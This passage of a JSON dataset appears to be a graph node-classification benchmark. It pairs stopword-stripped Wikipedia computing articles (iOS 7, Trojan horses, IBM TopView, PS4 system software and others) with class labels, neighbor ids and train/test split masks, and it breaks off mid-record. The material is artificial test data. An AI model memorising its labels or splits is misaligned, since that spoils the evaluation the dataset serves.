    "text": "Accredited_Symbian_Developer:accredited symbian developer accredited symbian developer asd defunct accreditation program software developers using symbian os mobile phone operating system terminated april 2011 closure symbian foundation scheme operated independently foundation behalf majinate limited also closed business foundation closed primary qualification accredited asd pass on-line multiple choice examination adhered principles symbian os curriculum curriculum reviewed annual basis ensure accreditation kept date developments symbian operating system final release curriculum made 2009 although still adhered closely asd primer learning aid published wiley symbian press imprint final version curriculum contained following major topics topic assessed marked separately examination pass required high score coverage majority topics",
    "neighbors": [
      6276,
      8423,
      10599,
      3626,
      7246,
      7983,
      9262,
      4305,
      7253,
      1687,
      2556,
      5406
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10755,
    "label": 2,
    "text": "IOS_7:ios 7 ios 7 seventh major release ios mobile operating system developed apple inc. successor ios 6 announced company worldwide developers conference june 10 2013 released september 18 2013 succeeded ios 8 september 17 2014. ios 7 introduced completely redesigned user interface design credited team led apple senior vice president design jony ive new look featuring flatter icons new slide-to-unlock function new animations described ive profound enduring beauty simplicity new design implemented throughout operating system including notification center updated three tabs offering different views information notifications visible lock screen redesigned siri voice assistant offering visual indicators control center offering easy access commonly used features ios 7 also introduced airdrop wireless sharing technology carplay phone car integration automatic app updates app store reception ios 7 mixed new design language criticized critics noting implementation design changes rather actual productivity improvements citing examples animations delaying access lack icon consistency buttons hidden negative aspects user experience addition control center praised updates siri multitasking shortly release reports new design causing sickness trend explained caused animations similar effects car sickness user adoption ios 7 fast ios market share reported high 35 one day installed 200 million devices within 5 days apple claimed fastest software upgrade history ios 7 introduced apple worldwide developers conference june 10 2013 beta release made available registered developers announcement ios 7 officially released september 18 2013. ios 7.0.1 released september 20 2013 specifically iphone 5c iphone 5s update included bug fixes allow users purchase itunes content touch id fingerprint recognition scanner rather passcode ios 7.0.2 released september 26 2013 update fixed bugs could allow someone bypass lock screen passcode reintroduced greek keyboard option passcode entry ios 7.0.3 released october 23 2013 support ipad air ipad mini 2 also included support icloud keychain password generator safari web browser updated lock screen delay slide unlock text touch id use many bug fixes ios 7.0.4 released november 14 2013 bug fixes addressing facetime calls failing ios 7.0.5 released january 29 2014 fix correcting network provisioning iphone 5s iphone 5c models china ios 7.0.6 released february 21 2014 fix ssl connection verification issue ios 7.1 released march 10 2014 update included improvements touch id fingerprint technology support carplay fix home screen crash issue also brought visual updates shift caps lock keys keyboard refined icons several apple standard apps redesign aspects phone dialer shutdown screens ios 7.1.1 released april 22 2014 bug fixes ios 7.1.2 released june 30 2014 bug fixes improved ibeacon connectivity stability last version ios supported iphone 4. ios 7 introduced complete visual overhaul user interface sharper flatter icons slimmer fonts new slide-to-unlock function new control panel slides bottom screen frequently accessed settings operating system also significantly redesigned standard pre-installed apps apple jony ive apple head design commented profound enduring beauty simplicity clarity efficiency true simplicity derived much absence clutter ornamentation bringing order complexity ... ios 7 clear representation goals whole new structure coherent applied across entire system ios 7 introduced airdrop wireless sharing technology accessible share icon lets users send files local device nearby ios devices enabled control center options controlling discovery devices including contacts everyone launch airdrop available iphone 5 later fourth-generation ipad later ipad minis fifth-generation ipod touch ios 7 introduced control center menu users access swiping bottom screen providing access frequently used settings airplane mode wi-fi bluetooth disturb mode rotation lock slider adjusting screen brightness controls music playback along volume slider flashlight toggle also available icon quickly accessing camera ios 7 overhauled notification center visual functional changes three tabs today information coming day missed notifications visible phone lock screen notifications synchronized across devices users n't need dismiss notification multiple times different devices ios 7 expanded screen app switching users double-tapped home button taken current app view full-screen thumbnails recently accessed apps carplay formerly ios car released part ios 7.1 integrates selected car models offer phone interaction including music controls maps navigation car display users also talk siri send messages hands-free supports lightning-equipped iphones ios 7.1 later siri features new design assistant fades background app blurred speaking visual vocal waves appear form spinning circle device communicates apple servers siri control limited set device settings including bluetooth assistant alternatively send user directly settings menu query controlled voice otherwise displays error request ca n't processed searching internet bing became default search engine siri web resources expanded include wikipedia siri also deeply connected twitter offering full tweet search ios 7 also allowed user change siri gender new options male female voices spotlight search accessed holding dragging home screen ios 7 came new wallpapers included parallax effect icons appear moving user moves phone around producing illusion icons floating background wallpaper settings users option make custom vibrations certain types notifications turn parallax wallpaper animation effect using reduce motion setting block callers block applying across multiple devices apps including phone messages facetime home screen newly installed apps recently updated apps blue dot next user opens app first time folders updated incorporate different pages similar home screen layout allowing significant expansion folder functionality page folder contain nine apps 15 pages total allowing total 135 apps single folder app store received several significant changes ios 7 users enable automatic app updates users view history updates installed app location services enabled app store near tab recommends popular apps based user geographic location also became possible download older versions apps case new ios versions left older devices incompatible system updates allowing users maintain working copy last supported update app ios 7 introduced square photo mode camera app enabling instagram-style photos also new live filters nine different filter options change photo appearance improvements camera included ability pinch-to-zoom video recording burst mode easily taking successive photos holding shutter button causing phone take 10 frames per second iphone 5s slow-motion video option added ability shoot video high frame rate 120 frames per second edited photos app users decide start end slow-motion part photos app updated new categorization options three tabs bottom photos shared albums open different app sections featuring galleries main photos interface app displays timeline photos sorted years collections moments filters added allowing users choose several types filters add photos alongside existing options sharing pictures app updated support new airdrop functionality music app integrated apple itunes radio service station-based music service let users choose artist service generating station based similar artists songs users able skip songs search history previous songs addition able purchase songs directly itunes store playing itunes radio also feature showed songs currently trending twitter itunes radio free ad-supported users could subscribe itunes match enabled ad-free playback two years release itunes radio eventually discontinued january 2016 features moving new apple music music subscription service beats 1 radio station ios 7 safari web browser received multiple significant updates two search bars found previous iterations browser combined single smart search field tab management improved allow eight open tabs well stacking tabs top vertically opposed horizontal card view option enter private tab built app rather settings menus new track button allows user manage privacy levels apple maps features turn-by-turn walking directions design maps updated feature full-screen view interface elements search bar disappear view alongside new translucent search lower toolbars night mode automatically activates users drive night separate siri volume control available maps enabling users change relative volume siri voice feedback independently system volume n't shout loud background music weather app ios 7 received significant changes including new icon absence static weather indicator app thumbnail home screen new dynamic visual representations current weather ios 7 facetime app iphone facetime audio feature allows users call wi-fi facetime audio accessible phone app contacts app facetime app available devices running ios 7 later messages app allows users see timestamps every message sent received reception ios 7 mixed mark rogowsky forbes criticized multiple aspects new design including 3d effect home screen wallpaper writing interaction ios 7 screen background challenging best writing new overall design language operating system icons fly screen whenever unlock like kind videogame effect pointless delays access phone fraction second arguably distracting joshua topolsky verge also criticized design noting lack icon consistency different parts os well writing instead correcting issues notification panel alerts apple simply given fresh coat paint several layers sub-navigation ... nothing actually speed productivity device nielsen norman group research company wrote extensive report user-experience ios 7 summarizing report flat design hides calls action swiping around edges interfere carousels scrolling david pogue new york times however liked minimalist design ios 7 writing longer spend new os 're grateful fixing de-annoyifying display swipe upward bottom screen open control center compact visual palette controls settings functions 're likely need also praised improvements siri voice assistant writing siri much better concluded writing structure layout features represent apple best work look ios 7 — well judgment darrell etherington techcrunch focused many new features introduced praising control center incredibly useful airdrop great although noting lack interoperability ios mac time siri generally useful new multitasking features smarter multitasking screen much better conclusion wrote question ios 7 dramatic change ios many users already know love balance update packed plenty new features make using apple mobile devices easier enjoyable critics noted influence competition mobile platforms design functionality ios 7 note use concepts android windows phone similarly minimal typographic design control center equivalent similar settings toggles notification shade android similar multitasking menu webos even design weather app almost identical windows 8 htc sense sascha segan pc magazine stated apple brilliance putting pieces together marketing apple developer apis history making money developers still reign supreme—there less piracy android bigger audience design flexibility windows phone adoption rate ios 7 reported high 35 one day within five days ios 7 installed 200 million devices apple claimed fastest software upgrade history august 2014 reported 91 ios devices ran ios 7 time september 2013 pranav dixit fast company reported user complaints shared apple support forums new design ios 7 including many zoom animations multitasking opening closing apps addition slight parallax effect causing users feel sick dixit noted parallax effect could turned animations option dr. george kikano division chief family medicine uh case medical center ohio told fox news ’ validity people susceptible fox news wrote dr. kikano said new parallax function causes background phone subtly move back forth feature leads effect unlike car sickness inner ear responsible balance eyes vision things sync feel dizzy nauseous people get people n't people get used adrian kingsley-hughes zdnet wrote march 2014 iphone ipad users reported battery drain ios 7.1 update lab testing andrew cunningham ars technica found hardware models experienced minor battery depletion others experienced statistically significant changes dom esposito 9to5mac reported june 2014 new lock screen bypass method discovered ios 7 allowing access phone 5 seconds certain circumstances issue later fixed ios 7 release fake advertisements claimed update would cause devices become waterproof airdrop mechanism protecting device screen breaking dropped release apple dropped support older devices specifically iphone 3gs fourth-generation ipod touch",
    "neighbors": [
      9732,
      1549,
      4111,
      5647,
      7697,
      6675,
      11289,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      8767,
      576,
      5696,
      2630,
      8774,
      8783,
      4180,
      10838,
      1623,
      3672,
      9308,
      3167,
      3681,
      9826,
      8806,
      3691,
      2673,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      5784,
      1177,
      4251,
      3228,
      2207,
      10406,
      11430,
      3241,
      171,
      6318,
      2735,
      3248,
      4283,
      3772,
      7869,
      9408,
      3790,
      7378,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      10470,
      231,
      6377,
      2282,
      9451,
      1772,
      4844,
      9964,
      10478,
      5363,
      7928,
      8441,
      11513,
      7420,
      2304,
      1290,
      3338,
      9999,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      10052,
      838,
      7496,
      8014,
      8019,
      4957,
      6495,
      9063,
      10602,
      3948,
      10608,
      2439,
      6023,
      6539,
      7052,
      7057,
      1427,
      3483,
      2979,
      9123,
      11171,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      8170,
      7154,
      5619,
      11257,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 10756,
    "label": 4,
    "text": "Trojan_horse_(computing):trojan horse computing computing trojan horse trojan malware misleads users true intent term derived ancient greek story deceptive trojan horse led fall city troy trojans generally spread form social engineering example user duped executing e-mail attachment disguised appear suspicious e.g. routine form filled clicking fake advertisement social media anywhere else although payload anything many modern forms act backdoor contacting controller unauthorized access affected computer trojans may allow attacker access users personal information banking information passwords personal identity also delete user files infect devices connected network ransomware attacks often carried using trojan unlike computer viruses worms trojans generally attempt inject files otherwise propagate terminology occurred first time us air force report 1974 analysis vulnerability computer systems made popular ken thompson 1983 turing award acceptance lecture reflections trusting trust subtitled mentioned knew possible existence trojan horses report security multics unfortunately unable find reference however paul karger roger schell affirm cited report trojan way may require interaction malicious controller necessarily distributing trojan fulfil purpose possible involved trojans scan computers network locate trojan installed hacker control trojans take advantage security flaw older versions internet explorer google chrome use host computer anonymizer proxy effectively hide internet usage enabling controller use internet illegal purposes potentially incriminating evidence indicates infected computer ip address host computer may may show internet history sites viewed using computer proxy first generation anonymizer trojan horses tended leave tracks page view histories host computer later generations trojan tend cover tracks efficiently several versions sub7 widely circulated us europe became widely distributed examples type trojan german-speaking countries spyware used made government sometimes called govware govware typically trojan software used intercept communications target computer countries like switzerland germany legal framework governing use software examples govware trojans include swiss minipanzer megapanzer german state trojan nicknamed r2d2 german govware works exploiting security gaps unknown general public accessing smartphone data becomes encrypted via applications due popularity botnets among hackers availability advertising services permit authors violate users privacy trojans becoming common according survey conducted bitdefender january june 2009 trojan-type malware rise accounting 83 global malware detected world trojans relationship worms spread help given worms travel across internet bitdefender stated approximately 15 computers members botnet usually recruited trojan infection",
    "neighbors": [
      3072,
      11266,
      4100,
      5636,
      10245,
      3595,
      5131,
      9227,
      9233,
      9746,
      8726,
      535,
      9242,
      2041,
      9761,
      2084,
      3620,
      4648,
      4649,
      9256,
      9771,
      3116,
      3629,
      46,
      6707,
      8243,
      5689,
      10297,
      3643,
      7739,
      3135,
      1088,
      9791,
      2114,
      4165,
      10309,
      9800,
      5707,
      81,
      4689,
      7251,
      10835,
      8789,
      8283,
      2654,
      611,
      612,
      2151,
      9832,
      107,
      8302,
      6772,
      8824,
      10872,
      10875,
      5245,
      1662,
      5246,
      6786,
      5764,
      9351,
      3724,
      5261,
      9356,
      10898,
      4756,
      4245,
      150,
      10392,
      665,
      1690,
      3739,
      9885,
      6303,
      5281,
      6305,
      5284,
      2213,
      11433,
      7855,
      10933,
      3262,
      8387,
      7368,
      10952,
      4298,
      5325,
      7886,
      9423,
      8914,
      10963,
      2262,
      6360,
      10457,
      3290,
      4314,
      8413,
      4830,
      224,
      8417,
      2275,
      6373,
      2796,
      10477,
      6382,
      2807,
      1271,
      3320,
      4344,
      10492,
      5373,
      5886,
      1279,
      4863,
      9983,
      9488,
      7441,
      8978,
      3347,
      4883,
      2325,
      278,
      7957,
      7449,
      3867,
      4892,
      5404,
      8998,
      297,
      2857,
      300,
      3887,
      2864,
      6454,
      1337,
      11577,
      827,
      7996,
      11583,
      3394,
      3395,
      839,
      6993,
      4435,
      858,
      7515,
      4956,
      11103,
      8032,
      5986,
      7522,
      3941,
      11621,
      2409,
      877,
      4462,
      1393,
      5491,
      10613,
      8054,
      9591,
      7547,
      10110,
      9087,
      1408,
      3969,
      8064,
      899,
      7044,
      901,
      1925,
      3462,
      9607,
      1417,
      5002,
      10121,
      10637,
      9102,
      3473,
      4498,
      5012,
      10132,
      6550,
      7066,
      3996,
      10141,
      9630,
      2975,
      5024,
      10657,
      8103,
      9640,
      939,
      6059,
      4013,
      9646,
      1970,
      4023,
      8632,
      7098,
      6588,
      11197,
      9664,
      9154,
      3525,
      8133,
      9160,
      2508,
      7633,
      467,
      2005,
      10710,
      5591,
      3032,
      9688,
      988,
      10208,
      9187,
      1515,
      11244,
      6643,
      3065,
      507,
      1020,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 10757,
    "label": 2,
    "text": "IBM_TopView:ibm topview topview first object-oriented multitasking windowing personal computer operating environment pc dos developed ibm announced august 1984 shipped march 1985 topview provided text-mode although also ran graphics mode operating environment allowed users run one application time pc ibm demonstrated early version product key customers making generally available around time shipped new pc computer microsoft announced windows 1.0 november 1983 international business machines ibm microsoft important partner popularizing ms-dos ibm pc notably announce support forthcoming window environment ibm determined microcomputer market needed multitasking environment released topview 1985 press speculated software start ibm plan increase control ibm pc even though nothing ibm pc proprietary including bios published world creating proprietary operating system similar ibm offered years larger computers topview also allowed ibm serve customers surprised new ibm come operating system able use hardware multitasking protected mode features new 80286 cpu dos applications still running 8086/8088 real mode even given topview virtual memory management capabilities hardware limitations still held new environment back—a base 256 kb ram room 80 kb application code data ram dos topview loaded 512-640 kb recommended load two typical application programs time maximum earlier ibm xt could installed loaded topview took back much memory consumed dos still enough satisfy industry critics topview ran real mode x86 processor could run well behaved dos programs i.e programs write directly screen used bios int 10h dos int 21h ibm assistant series productivity programs arrangement windows well behaved applications would use standard dos bios function calls access system services hardware misbehaving programs i.e programs write directly screen lotus 1-2-3 wordstar dbase iii would still run topview environment would consume entire screen object-oriented applications written using topview api topview updated make use virtual 8086 mode added intel 80386 processors allowed better virtualization initially compatibility extended features limited mainly ibm applications along third-party products like wordperfect volkswriter chicken-and-egg situation developed third-party developers reluctant add extended feature support block insert delete allow users cut/copy/paste applications see market demand dos programs however support functions allow user perform cut copy paste operations using topview pop-up menus believed ibm planned use topview force rely comply new technical specifications later versions topview released able successfully make challenging dos apps run multitasking fashion intercepting direct access system services hardware topview first introduced program information files pif files defined given dos program run multi-tasking environment notably avoid giving unnecessary resources could remain available programs topview pif files inherited extended quarterdeck desqview microsoft windows concept program information files also used digital research operating systems concurrent dos multiuser dos datapac system manager real/32 however using pifed command necessary program information got directly embedded .exe .com executable file version 1.1 introduced june 1986 added support ibm pc network ibm 3270 terminal emulation importantly support swapping non-resident programs added—onto hard disk computers high memory area machines equipped 286 cpu initially poor support dos batch files improved version 1.12 introduced april 1987 added support new ibm ps/2 series dos 3.30 operating system new ps/2 mice could also use four serial ports topview sold expectations start many potential users already satisfied cheaper less memory-intensive tsr task switchers like ready spotlight borland sidekick n't need multitasking environment topview ran graphics mode topview /g however rarely used mid-1987 ibm began shift focus away topview promoting use os/2 developers end users alike os/2 1.0 pre-emptive multitasking multithreading os allowed one real mode multiple 16-bit protected mode sessions run time pc/at based 80286 provided dos alternative announced april 1987 made available later december graphical user interface presentation manager added os/2 1.1 october 1988 1.1 could run without presentation manager well embedded system screen keyboard mouse interface required ibm officially stopped marketing final release topview version 1.12 3 july 1990 topview concept carried forward dos multitaskers notably quarterdeck desqview retained topview user interface many features plus added features support special features 80286 80386 compatible processors desqview/x released june 1992 true gui interface running dos variety similar programs topview also available including one dynamical systems called mondrian microsoft bought 1986 stated intention implementing topview api compatibility windows never happened later april 1992 ibm introduced os/2 2.0 included virtual 8086 mode full 32-bit support intel 80386 superseding even desqview similar environments os/2 2.0 priority based preemptive multitasking multithreading os including 32 levels priority time critical idle time 386 topview requires ibm pc dos versions 2.0 5.0 ms-dos 2.0 6.0 run later releases key contributors topview included david morrill father topview code-named orion glass project moved boca raton dennis mckinley tasking ross cook memory management bob hobbs topview toolkit neal whitten product manager bill gates steve ballmer gordon letwin key microsoft executives accepted invitation ibm executive estridge ibm boca raton see special demonstration topview gates disturbed windows multitasking windows used cooperative method share cpu windowing capabilities i.e overlapping windows etc topview gates witnessed topview running multiple copies microsoft basic interpreter running windows overlapping side-by-side multitasking fashion microsoft later released multitasking version ms-dos 4.0 multitasking learned meeting even though joint development agreement microsoft development topview estridge asked later told whitten whitten topview team wishes turn source code documentation topview microsoft within short time meeting estridge request granted gates gave code documentation group headed nathan myhrvold code modified according gates specifications purchased company product mondrian never released gates however gave members team key positions microsoft led joint development agreement microsoft agreement previously included dos co-develop os/2 agreement lasted 1990 done order satisfy usa vs. ibm anti-trust court case filed 1969 even though dismissed 1982 ibm mired antitrust troubles decade dismissal recover legal morass early mid-90s june 1990 ftc probe launched possible collusion microsoft ibm pc software market infoworld 1985 described topview bland plain vanilla software hogs far much memory byte also criticized topview memory usage stated find software written ibm pc topview-compatible noting low price innovative multitasking features magazine predicted software attract lot takers 1985 digital research positioned multitasking concurrent dos 4.1 gem alternative topview",
    "neighbors": [
      6148,
      6797,
      5006,
      2201,
      6311,
      2345,
      7849,
      7983,
      7986,
      2355,
      9397,
      10040,
      5450,
      6730,
      2380,
      5080,
      8792,
      1247,
      5856,
      8301,
      9455,
      1776,
      6129,
      242,
      499,
      7285,
      3960,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 10758,
    "label": 4,
    "text": "Excellent_SME:excellent sme excellent sme international project aiming establish white list small medium enterprises sme means certification system project brings emphasis web site certification since internet becoming prevailing media promotion search business opportunities partners project built three pillars excellent sme certificate obtained companies meeting basic criteria certificate issued period 1 year however credit score permanent monitoring certificate revoked prematurely holder credit score drops 6 publishing certificate holder exposes good standing business successful practices publishing possible holder web site stationery promotional materials vehicles etc observer thus instantly establish level trust would otherwise require inquiries credit rating agencies consequence selection business partner becomes easier faster cheaper risk free growing number certified companies business environment becomes transparent good enterprises exposed visible client easier task finding partner project initiated 2012 slovenia partners chamber commerce industry slovenia credit rating agency technology provider connet d.o.o serbia joined project year 2013 macedonia romania followed 2014 bulgaria joined",
    "neighbors": [],
    "mask": "Train"
  },
  {
    "node_id": 10759,
    "label": 1,
    "text": "Registry_of_Open_Access_Repositories:registry open access repositories registry open access repositories roar searchable international database indexing creation location growth open access institutional repositories contents roar created eprints university southampton uk 2003 began institutional archives registry renamed registry open access repositories 2006 date 3,000 institutional cross-institutional repositories registered 2015 roar uk-based directory open access repositories opendoar considered two leading open access directories worldwide roar larger directory allows direct submissions directory opendoar controls submission materials dependent discretion staff opendoar requires open access scholarly publications whereas roar allows types materials included roar allows filtering country type repository sorting repository name roar companion registry open access repository mandates policies roarmap searchable international database policies charts growth open access mandates policies adopted universities research institutions research funders require researchers provide open access peer-reviewed research article output depositing open access repository created eprints university southampton 2003 institutional self-archiving policy registry became registry open access repository material archiving policies 2006 registry open access repositories mandatory archiving policies registry open access repository mandates policies around 2014 roarmap mandates classified terms strength effectiveness melibea october 2015 open-access mandates adopted 520 universities 75 research funders worldwide",
    "neighbors": [
      4984,
      1857,
      7923,
      7575
    ],
    "mask": "None"
  },
  {
    "node_id": 10760,
    "label": 2,
    "text": "Ipkg:ipkg ipkg itsy package management system lightweight package management system designed embedded devices resembles debian dpkg used unslung operating system linksys nslu2 optware openwrt openmoko webos gumstix ipaq qnap nas appliances elsewhere early 2017 still used synology nas appliances luneos operating system although opkg increasingly common replacement usual package management systems ipkg command-line utility allows installation new packages upgrading removal existing packages querying package repositories available packages listing already installed packages development project discontinued many projects formerly used ipkg adopted ipkg fork opkg replacement",
    "neighbors": [
      4225,
      2178,
      11525,
      2310,
      2955,
      7435,
      7181,
      7947,
      9487,
      2448,
      3089,
      1682,
      788,
      1813,
      8213,
      10900,
      6680,
      8476,
      5670,
      4775,
      7847,
      6828,
      10109,
      6446,
      7983,
      1842,
      823,
      2872,
      6583,
      3131,
      5819,
      10172,
      190,
      3649,
      10817,
      9671,
      5067,
      3918,
      463,
      3667,
      6227,
      7293,
      4951,
      6361,
      2010,
      9564,
      2401,
      1379,
      7140,
      741,
      231,
      5096,
      6119,
      9063,
      9324,
      7920,
      6257,
      1138,
      1522,
      10096,
      6393,
      2045,
      8319
    ],
    "mask": "None"
  },
  {
    "node_id": 10761,
    "label": 2,
    "text": "PlayStation_4_system_software:playstation 4 system software playstation 4 system software updatable firmware operating system playstation 4 operating system orbis os based freebsd 9 native operating system playstation 4 orbis os fork freebsd version 9.0 released 12 january 2012 playstation 4 features two graphics apis low level api named gnm high level api named gnmx developers start gnmx wraps around gnm turn manages esoteric gpu details familiar way work developers used platforms like direct3d 11 another key area game programmable pixel shaders sony playstation shader language pssl introduced playstation 4 suggested playstation shader language similar hlsl standard directx 11 subtle differences could eliminated part preprocessor macros besides kernel related components components included worth mentioning cairo jquery lua mono openssl webkit pixman rendering library many open-source software although playstation 4 open console software development kit sdk based llvm clang sony chosen due conformant c c++ front-ends c++11 support compiler optimization diagnostics playstation 4 uses playstation dynamic menu graphical shell contrast xrossmediabar xmb used playstation portable playstation 3 well livearea used playstation vita playstation tv named dynamic menu options offers players context sensitive changing based player actually playstation 4 given time makes navigation simpler previous iteration dynamic menu alter little time possible users placing game disc drive actual gameplay beginning playstation 4 user interface attempts simplicity priority main place entertainment options content area prominently displayed large square icons horizontal line arranged recently used users scroll gamer newsfeed alternating brick-like formation reminiscent social media site pinterest many main objects display additional information cursor selected game may news updates advertisements downloadable content recently played games receive tiles along number mandatory items like live playstation internet browser applications content icon customization options sort would give players way mold display better suit needs augmented reality application playroom comes pre-installed playstation 4 console demonstrated e3 2013 utilizes sony playstation camera technology according sony fantastically fresh augmented reality entertainment experience created combining light bar located front dualshock 4 controller playstation camera players allowed produce small floating robot called asobi interacts players scans faces shoots fireballs playstation camera identifies player help light bar front flick touchpad dualshock 4 controller brings augmented reality bots function playroom creates illusion hundreds little bots inside controller released simply tap track pad functions like playstation vita ps4 owners view smartphone playstation vita drawing object flick anywhere augmented reality bots play remote play users operate ps4 uses playstation vita handheld game console allowing play ps4 games media small device via streaming games except exceptions require playstation move playstation camera compatible second screen used display unique content playing games support option confused split screen second screen may used show extra contents example maps alternate camera angles radar even playbooks sports games apart playstation vita mobile devices ipad android tablet also used second screen comes form official playstation app game companion apps knack quest heavy emphasis social features placed playstation 4 console loading ps4 number share-centric apps features new feature allows users check friends latest activities via landing page full pictures trophies recent events easy way find friends hand cross-chat feature dubbed party chat interesting way keep touch gives gamers ability chat users whether 're playing title ps4 sharing capabilities adds another layer console gaming ps4 owners able capture livestream gameplay simple button touch record 60 minutes latest gaming exploits quick press share button controller footage shared facebook twitter youtube also ability broadcast gameplay real time twitch ustream addition recording videos also social features community creation introduced via system updates favorite groups new section within friends app acts way quickly access people user plays feature aimed making easier faster get game session friends hand communities new hubs formed around shared interests like games activities play styles also exist smaller social features ps4 ability message friend request watch gameplay live playstation 4 console function without internet connection provide functionality connected internet example updates system software may downloaded internet users may play online internet properly connected online play main pillar playstation 4 playstation plus subscription required play majority ps4 titles online unlike playstation 3 titles according sony developing many new ways play connect ps4 requires large investment resources result sony claim keep service free maintain quality time considering cost thus decided would better charge fee order continue offer good service web browser included playstation 4 console based open source webkit layout engine unlike playstation 3 uses netfront browser using modern webkit core safari apple ps4 web browser receives high score html5 compliance testing however support adobe flash means websites require flash might display properly function intended also pdf format supported however one clear advantage gamers able cut gaming browsing back loss gameplay due multitasking feature web browser additionally ps4 web browser limited support usb keyboards seem support usb mice furthermore internet connection enabled playstation 4 allows users access variety playstation network psn services including playstation store playstation plus subscription service users may download buy games contents services also gamers able play selection ps3 titles via internet-based playstation gaming service playstation 4 supports playing 2d 3d blu-rays dvds. previously system software update required standard new consoles instead console needs go online activate player first time used system support audio cds internally year console launch sony partnered spotify bring music streaming service playstation 4 well predecessor february 2015 including ability stream music background game application plus ability control music playback via smartphone computers etc available free premium subscribers spotify sony later added blu-ray 3d support console via system update users also use media player application enjoy videos photos music saved usb storage devices media servers ps4 may serve good portable device video enjoyment addition game playing following multimedia file formats supported although according playstation support website ps4 could play mp4 videos support mp4 files encoded h.264/mpeg-4 avc high profile aac-lc playstation 4 backward compatible games previous playstation consoles launch though playstation 4 users play playstation 3 games directly 2014 playstation cloud-based streaming service allowed streaming selected ps3 games december 2015 sony added playstation 2 backward compatibility republished ps2 games dark cloud grand theft auto iii ps4 via playstation store americas europe supported ps2 games run via software emulation upscaled high definition ps4 systems instead remastered one updated access various ps4 features including trophies share play broadcasting remote play second-screen features however original ps2 game discs ps2 classics re-released ps3 compatible ps4 system arabic chinese simplified chinese traditional czech danish dutch english united kingdom english united states french canada french france finnish german greek hungarian indonesian italian japanese korean norwegian polish portuguese brazil portuguese portugal russian romanian spanish latin america spanish spain swedish thai turkish vietnamese initial version system software playstation 4 1.01 pre-installed original consoles support remote play second screen experiences added version 1.50 launched day playstation 4 console released north america november 15 2013 features accessible playstation vita console using ps4 link application second screen functionality also accessible smartphones tablets playstation mobile app also able record share video clips well broadcasting gameplay twitch.tv ustream supports blu-ray dvd-video playback version 1.60 released february 4 2014 improving dvd playback version 1.60 also adds support pulse elite wireless headsets version 1.70 released april 30 2014 adds number new features addition rich video editor called sharefactory offers users tools combine edit personalize captured video clips update also adds abilities share video clips screenshots streaming copy video clips screenshots usb storage version 1.75 released july 29 2014 adding support playback blu-ray 3d also improves sound quality 1.5-speed playback blu-ray dvd video version 1.76 released september 2 2014 came minor changes last update version 2.0 released october 28 2014 version 2.00 major upgrade playstation 4 system software among features introduced share play allows playstation plus users invite online friend join play session via streaming even copy game users pass control game entirely remote user partake cooperative multiplayer physically present version also adds youtube app ability upload video clips youtube users play music stored usb storage devices also support custom themes ability change background color users set themes home screens function screens user version version 2.50 released march 26 2015 adding suspend/resume feature allow players jump games ps button games suspended low-power rest mode instead closing completely version also allows console hard drive backed restored usb flash drive september 30 2015 sony released ps4 update 3.00 introduced entirely new features user-interface enhancements among new features ability share videos directly twitter dedicated playstation plus section tweaks interface streaming youtube improvements social features messages group creation ability save screenshots pngs increase online storage capacity 1 gb 10 gb also introduced playstation plus members sony states update create new ways connect friends players around world expanding social capabilities system even april 6 2016 sony released ps4 update 3.50 would enable ps4 use remote play functionality windows macos formerly named os x vg247 reported update allow remote play functionality computers running windows 8.1 windows 10 os x yosemite os x el capitan furthermore article explains remote play support resolution options 360p 540p 720p frame rate options 30 fps 60 fps one dualshock 4 controller connected via computer usb port september 13 2016 sony released ps4 update 4.00 added high dynamic range hdr home screen folder support 1080p streaming tweaks menus game info screens greater overview streamlined interfaces march 9 2017 sony released next major firmware update version 4.50 update includes support installing applications external hard drives custom wallpapers refined quick menu simplified notifications list custom status updates new 3d blu-ray support playstation vr includes support preloading game patches however developer make use first game take advantage feature littlebigplanet 3 october 3 2017 sony released ps4 update 5.00 overhauling master/sub-account system update allows customization accounts family members roles applying parental controls account groups system replaced new friends management system along support 5.1 7.1 surround sound configurations playstation vr new tournament bracket viewer made along tweaks broadcasting 1080p streaming 60 frames per second twitch possible changes ps message notifications quick menu lastly introduces localization czech greek hungarian indonesian romanian thai vietnamese languages 5.50 released march 8 2018 includes playtime restrictions child accounts ability hide applications library custom wallpapers via usb supersampling mode ps4 pro ability delete notifications september 13 2018 sony released ps4 update 6.00 major feature added ability use remote play ios devices minor improvements may 10 2019 sony interactive entertainment added ability remove purchased games download list playstation store delete games profile gaming platforms sony gaming platforms generation gaming platforms seventh generation",
    "neighbors": [
      3077,
      2061,
      9743,
      8725,
      4636,
      1067,
      1587,
      1080,
      5177,
      1083,
      1091,
      3651,
      7748,
      8266,
      6732,
      10316,
      7249,
      6738,
      9306,
      607,
      9320,
      5746,
      9844,
      7801,
      633,
      8316,
      8829,
      6781,
      1148,
      9343,
      643,
      11398,
      4745,
      6799,
      7325,
      2212,
      6311,
      4777,
      684,
      1718,
      5819,
      11459,
      10436,
      9927,
      8395,
      10455,
      6361,
      6873,
      8937,
      9452,
      3824,
      5363,
      1273,
      5896,
      4364,
      274,
      5397,
      1316,
      9508,
      10535,
      9512,
      4908,
      1839,
      7983,
      306,
      11573,
      9543,
      10056,
      9033,
      11080,
      850,
      6486,
      859,
      6491,
      7521,
      1891,
      359,
      873,
      7027,
      7028,
      2421,
      2424,
      7552,
      5506,
      9091,
      1927,
      6539,
      9625,
      1946,
      5534,
      10658,
      11698,
      8627,
      9151,
      9153,
      10202,
      4060,
      3551,
      998,
      487,
      4073,
      9201,
      3058,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10762,
    "label": 9,
